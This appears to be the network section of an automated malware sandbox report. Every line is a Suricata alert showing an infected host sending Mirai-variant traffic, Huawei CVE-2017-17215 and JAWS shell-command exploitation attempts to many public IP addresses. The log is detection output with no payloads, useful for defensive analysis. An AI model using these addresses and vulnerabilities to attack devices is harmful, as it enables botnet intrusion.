          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48018 -> 41.121.183.143:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54492 -> 197.240.9.178:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46176 -> 173.126.146.75:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59710 -> 121.249.204.73:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42888 -> 156.199.133.10:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59710 -> 121.249.204.73:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48550 -> 128.223.79.236:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48550 -> 128.223.79.236:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52144 -> 149.156.227.51:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52144 -> 149.156.227.51:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35728 -> 206.102.146.57:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35728 -> 206.102.146.57:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33484 -> 41.224.91.196:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51474 -> 197.156.215.79:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36870 -> 156.195.152.128:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50382 -> 41.62.51.45:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59988 -> 41.43.234.19:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44558 -> 197.22.131.223:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58404 -> 156.231.12.154:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46322 -> 156.40.232.29:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40154 -> 197.127.169.46:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38462 -> 41.173.232.151:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46650 -> 156.5.80.225:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47650 -> 25.10.197.174:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47650 -> 25.10.197.174:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39800 -> 41.62.95.14:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43598 -> 197.210.72.1:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49702 -> 41.140.250.130:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52530 -> 197.116.252.57:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38074 -> 69.189.168.77:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38074 -> 69.189.168.77:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47178 -> 166.78.173.116:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47178 -> 166.78.173.116:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56348 -> 170.169.198.71:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52868 -> 98.112.149.204:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56348 -> 170.169.198.71:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52868 -> 98.112.149.204:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54740 -> 41.89.102.223:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37954 -> 210.121.128.46:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37954 -> 210.121.128.46:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37208 -> 197.57.148.161:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34218 -> 174.54.4.5:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34218 -> 174.54.4.5:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34980 -> 217.200.202.101:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34980 -> 217.200.202.101:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37732 -> 131.122.230.5:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37732 -> 131.122.230.5:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38652 -> 156.105.25.60:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56060 -> 13.251.158.65:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56060 -> 13.251.158.65:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44554 -> 143.74.7.16:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44554 -> 143.74.7.16:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34908 -> 65.92.219.15:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34908 -> 65.92.219.15:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43764 -> 41.140.12.153:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39688 -> 197.93.17.171:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59872 -> 41.224.43.94:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54318 -> 156.16.141.164:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57642 -> 41.194.8.24:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34098 -> 93.111.230.102:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34098 -> 93.111.230.102:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55102 -> 50.206.223.170:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55102 -> 50.206.223.170:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48160 -> 197.95.181.147:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36620 -> 207.42.102.162:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36620 -> 207.42.102.162:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40278 -> 176.0.211.143:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40278 -> 176.0.211.143:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37022 -> 58.165.207.166:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55196 -> 199.52.65.11:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55196 -> 199.52.65.11:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37022 -> 58.165.207.166:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36026 -> 122.22.64.41:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36026 -> 122.22.64.41:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58554 -> 133.146.239.25:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58554 -> 133.146.239.25:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54516 -> 110.32.215.184:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54516 -> 110.32.215.184:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50054 -> 217.215.79.61:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32836 -> 208.73.48.66:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50054 -> 217.215.79.61:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32836 -> 208.73.48.66:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45228 -> 173.121.214.130:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53724 -> 49.191.180.50:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45228 -> 173.121.214.130:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34550 -> 101.32.81.235:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53724 -> 49.191.180.50:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34550 -> 101.32.81.235:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40634 -> 2.117.9.235:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37636 -> 208.48.134.72:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51746 -> 60.161.100.78:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34032 -> 119.237.14.234:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37636 -> 208.48.134.72:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51746 -> 60.161.100.78:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41306 -> 126.82.92.65:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42258 -> 78.227.173.202:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50560 -> 165.33.196.75:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41306 -> 126.82.92.65:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38966 -> 113.124.149.126:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57236 -> 32.44.232.39:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38966 -> 113.124.149.126:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34206 -> 199.103.66.44:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38628 -> 131.249.228.80:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38628 -> 131.249.228.80:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56448 -> 50.215.179.246:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34032 -> 119.237.14.234:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56448 -> 50.215.179.246:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57436 -> 50.205.67.103:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57436 -> 50.205.67.103:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34968 -> 197.237.200.90:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51722 -> 192.140.240.27:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51722 -> 192.140.240.27:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56662 -> 194.1.252.1:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59898 -> 223.66.174.24:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56662 -> 194.1.252.1:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50560 -> 165.33.196.75:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52108 -> 147.230.188.100:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44896 -> 155.90.17.170:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57236 -> 32.44.232.39:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34206 -> 199.103.66.44:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48358 -> 128.79.224.162:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48358 -> 128.79.224.162:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59898 -> 223.66.174.24:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42258 -> 78.227.173.202:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55482 -> 83.106.224.18:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35456 -> 133.207.20.234:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44896 -> 155.90.17.170:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35456 -> 133.207.20.234:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40634 -> 2.117.9.235:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55482 -> 83.106.224.18:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52108 -> 147.230.188.100:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57156 -> 156.4.226.109:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57126 -> 41.34.110.98:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51574 -> 197.77.114.80:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42890 -> 41.93.86.186:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33380 -> 41.29.70.158:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44028 -> 156.36.174.242:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50108 -> 41.59.229.59:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37090 -> 125.167.185.1:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37090 -> 125.167.185.1:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39734 -> 148.179.123.65:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33260 -> 200.230.245.168:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33554 -> 208.46.118.213:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33260 -> 200.230.245.168:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59790 -> 156.3.237.129:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35124 -> 80.159.50.231:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33554 -> 208.46.118.213:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35124 -> 80.159.50.231:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39734 -> 148.179.123.65:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48102 -> 210.246.226.218:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37570 -> 71.223.65.69:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48102 -> 210.246.226.218:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37570 -> 71.223.65.69:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50878 -> 97.197.44.174:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50878 -> 97.197.44.174:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43854 -> 131.130.228.105:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43854 -> 131.130.228.105:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52676 -> 41.231.63.71:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56794 -> 41.99.146.182:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49990 -> 197.249.234.114:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59106 -> 197.50.113.39:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59326 -> 68.241.111.73:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59326 -> 68.241.111.73:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45034 -> 110.127.114.232:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58652 -> 9.244.198.24:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45034 -> 110.127.114.232:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58652 -> 9.244.198.24:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55200 -> 41.67.6.6:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51068 -> 46.102.189.213:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48788 -> 41.191.132.34:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51068 -> 46.102.189.213:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52196 -> 41.28.29.27:37215
